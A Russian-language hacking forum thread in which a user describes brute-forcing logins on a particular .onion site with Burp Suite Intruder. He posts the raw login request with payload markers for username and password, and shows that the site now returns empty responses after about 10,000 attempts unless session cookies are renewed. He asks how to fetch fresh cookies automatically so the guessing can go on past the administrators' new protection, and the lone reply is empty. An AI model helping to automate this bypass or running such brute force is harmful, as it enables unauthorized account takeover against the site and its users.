Burp Suite вопрос по Intruder

Discussion in 'Песочница' started by mustafallah, 19 Dec 2016.

  1. mustafallah

    mustafallah New Member

    Joined:
    1 Sep 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Добрый день народ в общем ситуация такова. До сегодняшнего дня брутил один сайт при помощи интрудера ставил на ночь и у меня перебирало около 1000 000 комбинаций. Сейчас админы сделали небольшую защиту что мне приходится какждые 10 000 комбинаций перенастраивать все. Объясняю в чем причина.

    POST /login.php?action=in HTTP/1.1
    Host: site.onion
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://site.onion/login.php
    Cookie: ud=w; uw=327557622106; uk=492077513752
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 116
    form_sent=1&redirect_url=index.php&req_username=§user§&req_password=§password§&save_pass=1&login=%D0%92%D1%85%D0%BE%D0%B4

    Значит до 10 000 попыток приходит ответ, что логин и пароль неправильный, а после 10 000 начинает приходит ответ с содержимым 222 байта.... т.е. пустая страница.

    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 19 Dec 2016 15:43:11 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/7.0.13
    Cache-Control: private
    Content-Length: 0


    После чего мне приходится получить новые куки через браузер

    POST /login.php?action=in HTTP/1.1
    Host: site.onion
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://site.onion/login.php
    Cookie: ud=w; uw=327557681334; uk=492077602728
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 116

    form_sent=1&redirect_url=index.php&req_username=§user§&req_password=§password§&save_pass=1&login=%D0%92%D1%85%D0%BE%D0%B4

    То есть после смены uw и uk перебор продолжается.
    Бана по айпи нету.
    Как бы получать эти куки в автоматическом режиме чтобы перебор продолжался?

    Заранее огромное спасибо!
     
    #1 mustafallah, 19 Dec 2016
  2. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    _________________________
    #2 Kaimi, 19 Dec 2016
(You must log in or sign up to post here.)
Loading...
Similar Threads - Burp Suite вопрос
  1. gilo20

    Вопрос по шеллу

    gilo20, 26 Feb 2023, in forum: Песочница
    Replies:
    2
    Views:
    2,415
    crlf
    27 Feb 2023
  2. Dobi768

    Вопрос про nmap ssh-hostkey

    Dobi768, 14 Jan 2023, in forum: Песочница
    Replies:
    2
    Views:
    2,336
    Dobi768
    14 Jan 2023
  3. avva99on

    Вопрос по движку UMI.CMS

    avva99on, 15 Dec 2022, in forum: Песочница
    Replies:
    0
    Views:
    2,337
    avva99on
    15 Dec 2022
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.